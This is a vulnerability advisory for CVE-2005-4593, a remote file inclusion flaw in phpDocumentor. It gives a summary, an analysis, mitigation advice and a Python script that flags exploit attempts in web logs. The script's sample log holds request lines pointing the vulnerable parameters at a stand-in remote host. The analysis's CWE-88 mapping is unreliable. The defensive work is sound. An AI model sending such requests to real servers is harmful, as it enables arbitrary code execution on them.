CVE-2005-4593 in phpDocumentor
Summary
by MITRE
PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary code via a URL in the (1) FORUM[LIB] parameter in Documentation/tests/bug-559668.php and (2) the root_dir parameter in docbuilder/file_dialog.php.
Analysis
by VulDB Data Team • 06/26/2025
The vulnerability described in CVE-2005-4593 represents a critical remote file inclusion flaw within the phpDocumentor software ecosystem, specifically affecting versions 1.3.0 rc4 and earlier. This vulnerability exploits a fundamental security weakness that arises when the register_globals PHP configuration setting is enabled, creating an exploitable condition that allows remote attackers to inject malicious code through carefully crafted HTTP parameters. The flaw manifests in two distinct attack vectors within the software's codebase, each targeting different components of the documentation building system.
The technical exploitation occurs through manipulation of HTTP request parameters that are directly incorporated into file inclusion operations without proper validation or sanitization. In the first instance, the FORUM[LIB] parameter within Documentation/tests/bug-559668.php accepts user-supplied input that gets processed through a file inclusion mechanism, while the second vulnerability targets the root_dir parameter in docbuilder/file_dialog.php. Both vectors demonstrate a classic path traversal and code execution vulnerability where attacker-controlled input flows directly into include or require statements, enabling arbitrary code execution on the vulnerable server. This vulnerability directly maps to CWE-88, which describes improper neutralization of special elements used in an expression, and CWE-94, which covers execution of arbitrary code.
The operational impact of this vulnerability extends far beyond simple code execution, as it provides attackers with complete control over the affected server running phpDocumentor. An attacker who successfully exploits this vulnerability can execute arbitrary commands, potentially leading to data theft, server compromise, or further network infiltration. The vulnerability is particularly dangerous in environments where register_globals is enabled, as this configuration setting automatically creates PHP global variables from request parameters, making the application more susceptible to injection attacks. The attack surface is expanded by the fact that both vulnerable files are part of the standard phpDocumentor distribution, meaning that any installation running vulnerable versions is immediately at risk.
Security professionals should note that this vulnerability aligns with ATT&CK technique T1059.007, which describes the use of scripting languages for execution, and T1190, which covers exploitation of remote services. Organizations should immediately upgrade to phpDocumentor versions beyond 1.3.0 rc4 to remediate this vulnerability, as no patches were provided for the affected versions. The recommended mitigation strategy includes disabling register_globals in PHP configuration, implementing proper input validation and sanitization for all user-supplied parameters, and employing web application firewalls to detect and block suspicious parameter patterns. Additionally, network segmentation and access controls should be implemented to limit the potential impact of successful exploitation, while regular security assessments should verify that no other similar vulnerabilities exist within the application codebase.
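The parameter-pattern detection mentioned above can be prototyped against web server access logs. The following is an added example, not code from phpDocumentor or VulDB: it flags requests to the two scripts named in the summary whose FORUM[LIB] or root_dir value begins with a URL scheme. The function name, the log format (Apache/nginx combined) and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths (lowercased) and parameter names from the CVE description.
TARGETS = {
    "documentation/tests/bug-559668.php": "FORUM[LIB]",
    "docbuilder/file_dialog.php": "root_dir",
}
# A value that starts with a URL scheme is what makes the include remote.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses, .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /phpdoc/docbuilder/'
    'file_dialog.php?root_dir=http://host.example.invalid/x HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2006:10:00:05 +0000] "GET /phpdoc/Documentation/tests/'
    'bug-559668.php?FORUM%5BLIB%5D=http%3A%2F%2Fhost.example.invalid%2Fx HTTP/1.1" 200 128',
    '198.51.100.7 - - [01/Jan/2006:10:01:00 +0000] "GET /phpdoc/docbuilder/'
    'file_dialog.php?root_dir=/var/www/project HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2006:10:02:00 +0000] "GET /index.php'
    '?page=http://host.example.invalid/x HTTP/1.1" 200 99',
]


def flag_rfi_attempts(log_lines):
    """Return (line_number, path, parameter, value) for each suspicious request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group(1))
        path = url.path.lower()
        for suffix, param in TARGETS.items():
            if not path.endswith("/" + suffix):
                continue
            # parse_qsl percent-decodes, so FORUM%5BLIB%5D matches FORUM[LIB].
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name == param and REMOTE_VALUE.match(value):
                    hits.append((n, url.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in flag_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string. With register_globals enabled the same variables can also be set from a POST body or a cookie, which this check does not see, so it complements rather than replaces upgrading and disabling register_globals.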